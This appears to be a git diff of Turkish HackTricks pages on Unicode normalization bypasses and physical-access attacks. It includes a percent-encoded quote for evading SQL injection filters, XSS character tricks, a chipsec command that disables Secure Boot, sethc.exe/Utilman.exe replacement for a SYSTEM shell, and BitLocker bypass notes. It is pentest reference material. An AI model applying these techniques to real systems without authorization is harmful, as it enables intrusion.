<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* **Bir **cybersecurity şirketinde mi çalışıyorsunuz? **HackTricks'te şirketinizi reklamını görmek ister misiniz**? veya **PEASS'ın en son sürümüne erişmek veya HackTricks'i PDF olarak indirmek ister misiniz**? [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu
|
||||
* [**Resmi PEASS & HackTricks swag**](https://peass.creator-spring.com)'ı alın
|
||||
* **Katılın** [**💬**](https://emojipedia.org/speech-balloon/) **Discord grubuna**](https://discord.gg/hRep4RUj7f) veya **telegram grubuna** veya **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**'u takip edin.**
|
||||
* **Hacking hilelerinizi paylaşarak PR'lar göndererek** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **ve** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **paylaşın.**
|
||||
* **Bir **cybersecurity şirketinde mi çalışıyorsunuz? **Şirketinizi HackTricks'te** görmek ister misiniz? veya **PEASS'ın en son sürümüne erişmek veya HackTricks'i PDF olarak indirmek** ister misiniz? [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
|
||||
* [**The PEASS Ailesi**](https://opensea.io/collection/the-peass-family)'ni keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu
|
||||
* [**Resmi PEASS & HackTricks ürünlerini alın**](https://peass.creator-spring.com)
|
||||
* **Katılın** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya beni **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin.**
|
||||
* **Hacking püf noktalarınızı paylaşın, PR'lar göndererek** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **ve** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **ile.**
|
||||
|
||||
</details>
|
||||
|
|
|
@ -6,21 +6,21 @@
|
|||
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)'da **takip edin**.
|
||||
* **Hacking püf noktalarınızı paylaşarak PR göndererek HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
* **Hacking püf noktalarınızı paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunan bir **dark-web** destekli arama motorudur.
|
||||
[**WhiteIntel**](https://whiteintel.io), **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
|
||||
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
|
||||
|
||||
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
||||
|
||||
|
@ -28,16 +28,16 @@ Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
|||
|
||||
---
|
||||
|
||||
**Bu, şu özetin bir özeti:** [**https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/**](https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/). Daha fazla detay için bakın (resimler oradan alınmıştır).
|
||||
**Bu, şunun özeti:** [**https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/**](https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/). Daha fazla detay için bakabilirsiniz (resimler oradan alınmıştır).
|
||||
|
||||
## Unicode ve Normalizasyonun Anlaşılması
|
||||
|
||||
Unicode normalizasyonu, karakterlerin farklı ikili temsillerinin aynı ikili değere standart hale getirildiği bir süreçtir. Bu süreç, programlama ve veri işleme süreçlerinde dizelerle uğraşırken hayati öneme sahiptir. Unicode standardı iki tür karakter eşdeğerliği tanımlar:
|
||||
|
||||
1. **Kanonik Eşdeğerlik**: Karakterler, yazıldığında veya görüntülendiğinde aynı görünüme ve anlama sahipse kanonik olarak eşdeğer kabul edilir.
|
||||
2. **Uyumluluk Eşdeğerlik**: Karakterler aynı soyut karakteri temsil edebilir ancak farklı şekilde görüntülenebilirler.
|
||||
2. **Uyumluluk Eşdeğerliği**: Karakterler aynı soyut karakteri temsil edebilir ancak farklı şekilde görüntülenebilirler.
|
||||
|
||||
**Dört Unicode normalizasyon algoritması** vardır: NFC, NFD, NFKC ve NFKD. Her algoritma, kanonik ve uyumluluk normalizasyon tekniklerini farklı şekilde kullanır. Daha derinlemesine anlayış için bu teknikleri [Unicode.org](https://unicode.org/) üzerinde keşfedebilirsiniz.
|
||||
**Dört Unicode normalizasyon algoritması** vardır: NFC, NFD, NFKC ve NFKD. Her algoritma, kanonik ve uyumluluk normalizasyon tekniklerini farklı şekilde kullanır. Daha derinlemesine anlamak için bu teknikleri [Unicode.org](https://unicode.org/) üzerinde keşfedebilirsiniz.
|
||||
|
||||
### Unicode Kodlamasında Ana Noktalar
|
||||
|
||||
|
@ -45,11 +45,11 @@ Unicode kodlamasını anlamak, farklı sistemler veya diller arasındaki etkile
|
|||
|
||||
* **Kod Noktaları ve Karakterler**: Unicode'da, her karakter veya sembol, "kod noktası" olarak bilinen bir sayısal değerle ilişkilendirilir.
|
||||
* **Bayt Temsili**: Kod noktası (veya karakter), bellekte bir veya daha fazla bayt tarafından temsil edilir. Örneğin, İngilizce konuşulan ülkelerde yaygın olan LATIN-1 karakterleri bir bayt kullanılarak temsil edilir. Ancak, daha fazla karakter kümesine sahip diller, temsil için daha fazla bayt gerektirir.
|
||||
* **Kodlama**: Bu terim, karakterlerin bir dizi bayta dönüştürülme şeklini ifade eder. UTF-8, ASCII karakterlerinin bir baytla temsil edildiği yaygın bir kodlama standardıdır ve diğer karakterler için dört bayta kadar kullanılır.
|
||||
* **Kodlama**: Bu terim, karakterlerin bir dizi bayta nasıl dönüştürüldüğünü ifade eder. UTF-8, ASCII karakterlerinin bir baytla temsil edildiği yaygın bir kodlama standardıdır ve diğer karakterler için dört bayta kadar kullanılır.
|
||||
* **Veri İşleme**: Veri işleyen sistemler, bayt akışını doğru şekilde karakterlere dönüştürmek için kullanılan kodlamayı bilmelidir.
|
||||
* **UTF Çeşitleri**: UTF-8'in yanı sıra, UTF-16 (en az 2 bayt, en fazla 4) ve UTF-32 (tüm karakterler için 4 bayt kullanır) gibi diğer kodlama standartları bulunmaktadır.
|
||||
* **UTF Çeşitleri**: UTF-8'in yanı sıra, UTF-16 (en az 2 bayt, en fazla 4 bayt) ve UTF-32 (tüm karakterler için 4 bayt kullanımı) gibi diğer kodlama standartları bulunmaktadır.
|
||||
|
||||
Bu kavramları anlamak, Unicode'in karmaşıklığından ve çeşitli kodlama yöntemlerinden kaynaklanan potansiyel sorunları etkili bir şekilde ele almak ve azaltmak için hayati öneme sahiptir.
|
||||
Bu kavramları anlamak, Unicode'ın karmaşıklığından ve çeşitli kodlama yöntemlerinden kaynaklanan potansiyel sorunları etkili bir şekilde ele almak ve azaltmak için hayati önem taşır.
|
||||
|
||||
İki farklı baytı temsil eden aynı karakteri nasıl normalleştirdiğine dair bir örnek:
|
||||
```python
|
||||
|
@ -59,7 +59,7 @@ unicodedata.normalize("NFKD","chloe\u0301") == unicodedata.normalize("NFKD", "ch
|
|||
|
||||
### Keşfetme
|
||||
|
||||
Eğer bir web uygulamasında geriye yansıtılan bir değer bulabilirseniz, **'KELVİN İŞARETİ' (U+0212A)** gönderebilirsiniz ki bu **"K" olarak normalize edilir** (bu şekilde gönderebilirsiniz `%e2%84%aa`). Eğer geriye bir "K" yansıtılıyorsa, o zaman bir tür **Unicode normalizasyonu** gerçekleştiriliyor demektir.
|
||||
Eğer bir web uygulamasında geri yansıtılan bir değer bulabilirseniz, **'KELVİN İŞARETİ' (U+0212A)** gönderebilirsiniz ki bu **"K" olarak normalize edilir** (bu şekilde gönderebilirsiniz `%e2%84%aa`). Eğer geriye "K" yansıtılıyorsa, bir tür **Unicode normalizasyonu** gerçekleştiriliyor demektir.
|
||||
|
||||
Diğer **örnek**: `%F0%9D%95%83%E2%85%87%F0%9D%99%A4%F0%9D%93%83%E2%85%88%F0%9D%94%B0%F0%9D%94%A5%F0%9D%99%96%F0%9D%93%83` **unicode**'den sonra `Leonishan` olarak çıkar.
|
||||
|
||||
|
@ -67,9 +67,9 @@ Diğer **örnek**: `%F0%9D%95%83%E2%85%87%F0%9D%99%A4%F0%9D%93%83%E2%85%88%F0%9D
|
|||
|
||||
### **SQL Injection filtresi atlatma**
|
||||
|
||||
Kullanıcı girdisiyle SQL sorguları oluşturmak için karakter `'` kullanan bir web sayfasını hayal edin. Bu web sitesi, güvenlik önlemi olarak, kullanıcı girdisindeki tüm karakter **`'`**'lerin tümünü **siler**, ancak bu silme işleminden sonra ve sorgunun oluşturulmasından **önce**, kullanıcının girdisini **Unicode** kullanarak **normalize** eder.
|
||||
Kullanıcı girdisiyle SQL sorguları oluşturmak için karakter `'` kullanan bir web sayfasını hayal edin. Bu web sitesi, güvenlik önlemi olarak kullanıcı girdisindeki tüm karakter **`'`**'lerin tümünü **siler**, ancak bu silme işleminden sonra ve sorgunun oluşturulmasından **önce**, kullanıcının girdisini **Unicode** kullanarak **normalize** eder.
|
||||
|
||||
Bu durumda, kötü niyetli bir kullanıcı, `%ef%bc%87` gibi `' (0x27)`'ye eşdeğer farklı bir Unicode karakteri ekleyebilir, girdi normalize edildiğinde, tek tırnak oluşturulur ve bir **SQL Injection açığı** ortaya çıkar:
|
||||
Bu durumda, kötü niyetli bir kullanıcı, `' (0x27)`'ye eşdeğer farklı bir Unicode karakteri ekleyebilir, örneğin `%ef%bc%87`, girdi normalize edildiğinde tek tırnak oluşturulur ve bir **SQLInjection zafiyeti** ortaya çıkar:
|
||||
|
||||
![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../.gitbook/assets/image (699).png>)
|
||||
|
||||
|
@ -105,7 +105,7 @@ Bu durumda, kötü niyetli bir kullanıcı, `%ef%bc%87` gibi `' (0x27)`'ye eşde
|
|||
|
||||
### XSS (Cross Site Scripting)
|
||||
|
||||
Web uygulamasını kandırarak ve XSS'yi sömürmek için aşağıdaki karakterlerden birini kullanabilirsiniz:
|
||||
Web uygulamasını kandırmak ve XSS'yi sömürmek için aşağıdaki karakterlerden birini kullanabilirsiniz:
|
||||
|
||||
![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../.gitbook/assets/image (312) (2).png>)
|
||||
|
||||
|
@ -115,7 +115,7 @@ Web uygulamasını kandırarak ve XSS'yi sömürmek için aşağıdaki karakterl
|
|||
|
||||
### Regex Fuzzing
|
||||
|
||||
Arka uç, **kullanıcı girdisini bir regex ile kontrol ederken**, **girdinin** regex için **normalize edildiği** ancak **kullanıldığı yerde değil** olabileceği durumlarla karşılaşılabilir. Örneğin, Açık Yönlendirme veya SSRF'de regex, gönderilen URL'yi **normalize edebilir** ancak daha sonra **olduğu gibi erişebilir**.
|
||||
Arka uç **bir regex ile kullanıcı girdisini kontrol ettiğinde**, **girdinin regex için normalize edilmiş olabileceği**, ancak **kullanıldığı yer için değil** olabileceğine dikkat edilmelidir. Örneğin, Açık Yönlendirme veya SSRF'de regex **gönderilen URL'yi normalize edebilir**, ancak **bunu olduğu gibi erişebilir**.
|
||||
|
||||
[**recollapse**](https://github.com/0xacb/recollapse) aracı, arka ucu test etmek için girdinin çeşitli varyasyonlarını oluşturmanıza olanak tanır. Daha fazla bilgi için **github** ve bu [**gönderiye**](https://0xacb.com/2022/11/21/recollapse) bakın.
|
||||
|
||||
|
@ -125,11 +125,11 @@ Arka uç, **kullanıcı girdisini bir regex ile kontrol ederken**, **girdinin**
|
|||
* [**https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work**](https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work)
|
||||
* [**https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html**](https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html)
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için ücretsiz işlevsellikler sunan **karanlık ağ** destekli bir arama motorudur.
|
||||
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini kontrol etmek için ücretsiz** işlevsellikler sunan **karanlık ağ** destekli bir arama motorudur.
|
||||
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
|
||||
|
||||
|
@ -143,10 +143,10 @@ Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
|||
|
||||
HackTricks'i desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklamınızı görmek veya HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
|
||||
* **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini alın**](https://peass.creator-spring.com)
|
||||
* [**The PEASS Family'yi keşfedin**](https://opensea.io/collection/the-peass-family), özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu keşfedin
|
||||
* **💬 Discord grubuna** **katılın**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**'ı takip edin**.
|
||||
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek HackTricks** ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
* **💬 [Discord grubuna](https://discord.gg/hRep4RUj7f) katılın veya [telegram grubuna](https://t.me/peass) katılın veya bizi Twitter'da** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** takip edin.**
|
||||
* **Hacking püf noktalarınızı göndererek HackTricks ve HackTricks Cloud github depolarına PR göndererek paylaşın.**
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,21 +2,21 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>AWS hackleme konusunda sıfırdan kahramana dönüşün</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile öğrenin!</strong></summary>
|
||||
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* [**Resmi PEASS & HackTricks ürünlerini alın**](https://peass.creator-spring.com)
|
||||
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonu
|
||||
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin.**
|
||||
* **Hacking püf noktalarınızı paylaşarak** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR gönderin.
|
||||
* **Hacking püf noktalarınızı göndererek HackTricks** ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR gönderin.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunan **dark-web** destekli bir arama motorudur.
|
||||
|
||||
|
@ -30,39 +30,39 @@ Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
|||
|
||||
## BIOS Şifresi Kurtarma ve Sistem Güvenliği
|
||||
|
||||
**BIOS'un sıfırlanması** birkaç farklı şekilde gerçekleştirilebilir. Çoğu anakartın içinde, BIOS ayarlarını, şifreyi de dahil olmak üzere sıfırlayacak olan bir **pil** bulunmaktadır ve bu pil yaklaşık **30 dakika** çıkarıldığında BIOS ayarları sıfırlanır. Alternatif olarak, anakart üzerindeki bir **jumper** belirli pinleri birleştirerek bu ayarları sıfırlamak için ayarlanabilir.
|
||||
**BIOS'un sıfırlanması** birkaç farklı şekilde gerçekleştirilebilir. Çoğu anakartın içinde, BIOS ayarlarını, şifreyi de dahil olmak üzere sıfırlayan bir **pil** bulunur ve bu pil yaklaşık **30 dakika** çıkarıldığında BIOS ayarlarını sıfırlar. Alternatif olarak, anakart üzerindeki bir **jumper** belirli pinleri birleştirerek bu ayarları sıfırlamak için ayarlanabilir.
|
||||
|
||||
Donanım ayarlarının mümkün veya pratik olmadığı durumlarda, **yazılım araçları** bir çözüm sunar. **Kali Linux** gibi dağıtımlarla bir sistem **Canlı CD/USB** üzerinden çalıştırılarak **_killCmos_** ve **_CmosPWD_** gibi araçlara erişim sağlanabilir ve BIOS şifresi kurtarmada yardımcı olabilir.
|
||||
Donanım ayarlarının mümkün veya pratik olmadığı durumlar için, **yazılım araçları** bir çözüm sunar. **Kali Linux** gibi dağıtımlarla bir sistem **Canlı CD/USB** üzerinden çalıştırılarak **_killCmos_** ve **_CmosPWD_** gibi araçlara erişim sağlanabilir ve BIOS şifresi kurtarmada yardımcı olabilir.
|
||||
|
||||
BIOS şifresi bilinmediğinde, yanlış girilmesi durumunda genellikle bir hata kodu alınır. Bu kod, [https://bios-pw.org](https://bios-pw.org) gibi web sitelerinde kullanılarak kullanılabilir bir şifre alınabilir.
|
||||
BIOS şifresi bilinmediğinde, yanlışlıkla üç kez girilmesi genellikle bir hata koduna neden olur. Bu kod, [https://bios-pw.org](https://bios-pw.org) gibi web sitelerinde kullanılarak kullanılabilir bir şifre alınabilir.
|
||||
|
||||
### UEFI Güvenliği
|
||||
|
||||
Geleneksel BIOS yerine **UEFI** kullanan modern sistemler için, **chipsec** aracı, **Secure Boot**'u devre dışı bırakma dahil olmak üzere UEFI ayarlarını analiz etmek ve değiştirmek için kullanılabilir. Bu, aşağıdaki komutla gerçekleştirilebilir:
|
||||
Geleneksel BIOS yerine **UEFI** kullanan modern sistemler için, **chipsec** aracı, **Secure Boot**'un devre dışı bırakılması da dahil olmak üzere UEFI ayarlarını analiz etmek ve değiştirmek için kullanılabilir. Bu, aşağıdaki komutla gerçekleştirilebilir:
|
||||
|
||||
`python chipsec_main.py -module exploits.secure.boot.pk`
|
||||
|
||||
### RAM Analizi ve Soğuk Başlatma Saldırıları
|
||||
|
||||
RAM, güç kesildikten sonra genellikle **1 ila 2 dakika** boyunca verileri korur. Bu süre, sıvı nitrojen gibi soğutucu maddeler uygulanarak **10 dakikaya** kadar uzatılabilir. Bu uzatılmış süre zarfında, **dd.exe** ve **volatility** gibi araçlar kullanılarak bir **bellek dökümü** oluşturulabilir ve analiz edilebilir.
|
||||
RAM, güç kesildikten sonra genellikle **1 ila 2 dakika** boyunca verileri kısa süre tutar. Bu süre, sıvı nitrojen gibi soğutucu maddeler uygulanarak **10 dakikaya** kadar uzatılabilir. Bu uzatılmış süre zarfında, **dd.exe** ve **volatility** gibi araçlar kullanılarak bir **bellek dökümü** oluşturulabilir ve analiz edilebilir.
|
||||
|
||||
### Doğrudan Bellek Erişimi (DMA) Saldırıları
|
||||
|
||||
**INCEPTION**, DMA aracılığıyla fiziksel bellek manipülasyonu için tasarlanmış bir araçtır ve **FireWire** ve **Thunderbolt** gibi arabirimlerle uyumludur. Bu araç, belleği herhangi bir şifreyi kabul edecek şekilde yamalayarak giriş prosedürlerini atlamayı sağlar. Ancak, **Windows 10** sistemlerine karşı etkisizdir.
|
||||
**INCEPTION**, **FireWire** ve **Thunderbolt** gibi arayüzlerle uyumlu olarak DMA aracılığıyla **fiziksel bellek manipülasyonu** için tasarlanmış bir araçtır. Herhangi bir şifreyi kabul etmek için belleği yamalayarak giriş prosedürlerini atlamayı sağlar. Ancak, **Windows 10** sistemlerine karşı etkisizdir.
|
||||
|
||||
### Sistem Erişimi İçin Canlı CD/USB
|
||||
|
||||
**_sethc.exe_** veya **_Utilman.exe_** gibi sistem ikili dosyalarını **_cmd.exe_** kopyasıyla değiştirerek sistem ayrıcalıklarıyla bir komut istemini sağlayabilirsiniz. **chntpw** gibi araçlar, Windows kurulumunun **SAM** dosyasını düzenlemek için kullanılabilir, böylece şifre değişiklikleri yapılabilir.
|
||||
**_sethc.exe_** veya **_Utilman.exe_** gibi sistem ikili dosyalarını **_cmd.exe_** kopyasıyla değiştirerek sistem ayrıcalıklarına sahip bir komut istemini sağlayabilir. **chntpw** gibi araçlar, Windows kurulumunun **SAM** dosyasını düzenlemek için kullanılabilir, böylece şifre değişiklikleri yapılabilir.
|
||||
|
||||
**Kon-Boot**, Windows sistemlerine şifreyi bilmeden geçici olarak Windows çekirdeğini veya UEFI'yi değiştirerek oturum açmayı kolaylaştıran bir araçtır. Daha fazla bilgiye [https://www.raymond.cc](https://www.raymond.cc/blog/login-to-windows-administrator-and-linux-root-account-without-knowing-or-changing-current-password/) adresinden ulaşılabilir.
|
||||
|
||||
### Windows Güvenlik Özelliklerinin İşlenmesi
|
||||
|
||||
#### Başlangıç ve Kurtarma Kısayolları
|
||||
#### Başlatma ve Kurtarma Kısayolları
|
||||
|
||||
- **Supr**: BIOS ayarlarına erişim.
|
||||
- **F8**: Kurtarma moduna girme.
|
||||
- Windows bannerından sonra **Shift** tuşuna basarak otomatik oturumu atlayabilirsiniz.
|
||||
- **F8**: Kurtarma moduna gir.
|
||||
- Windows logosundan sonra **Shift** tuşuna basarak otomatik oturumu atlayabilirsiniz.
|
||||
|
||||
#### KÖTÜ USB Cihazları
|
||||
|
||||
|
@ -74,8 +74,34 @@ Yönetici ayrıcalıkları, PowerShell aracılığıyla **SAM** dosyası dahil h
|
|||
|
||||
### BitLocker Şifrelemesini Atlatma
|
||||
|
||||
BitLocker şifrelemesi, **hafıza dökümü dosyası (MEMORY.DMP)** içinde **kurtarma şifresi** bulunursa atlatılabilir. Bu amaçla **Elcomsoft Forensic Disk Decryptor** veya **Passware Kit Forensic** gibi araçlar kullanılabilir.
|
||||
BitLocker şifrelemesi, **hafıza dökümü dosyası (MEMORY.DMP)** içindeki **kurtarma şifresi** bulunursa atlatılabilir. Bu amaçla **Elcomsoft Forensic Disk Decryptor** veya **Passware Kit Forensic** gibi araçlar kullanılabilir.
|
||||
|
||||
### Kurtarma Anahtarı Eklemek İçin Sosyal Mühendislik
|
||||
|
||||
Yeni bir BitLocker kurtarma anahtarı, bir kullanıcıyı sıfırlama işlemi yapacak bir komutu çalıştırmaya ikna ederek sosyal mühendislik taktikleriyle eklenir ve bu da şifreleme işlemini basitleştirir.
|
||||
Yeni bir BitLocker kurtarma anahtarı, bir kullanıcıyı sıfırlama işlemi yapacak bir komutu çalıştırmaya ikna ederek sosyal mühendislik taktikleriyle eklenir ve bu sayede şifre çözme işlemi basitleştirilir.
|
||||
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunan **dark-web** destekli bir arama motorudur.
|
||||
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
|
||||
|
||||
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini alın**](https://peass.creator-spring.com)
|
||||
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonu
|
||||
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin.**
|
||||
* **Hacking püf noktalarınızı göndererek HackTricks** ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR gönderin.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,25 +2,25 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile</strong></summary>
|
||||
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> ile sıfırdan kahramana kadar AWS hacklemeyi öğrenin!</summary>
|
||||
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
|
||||
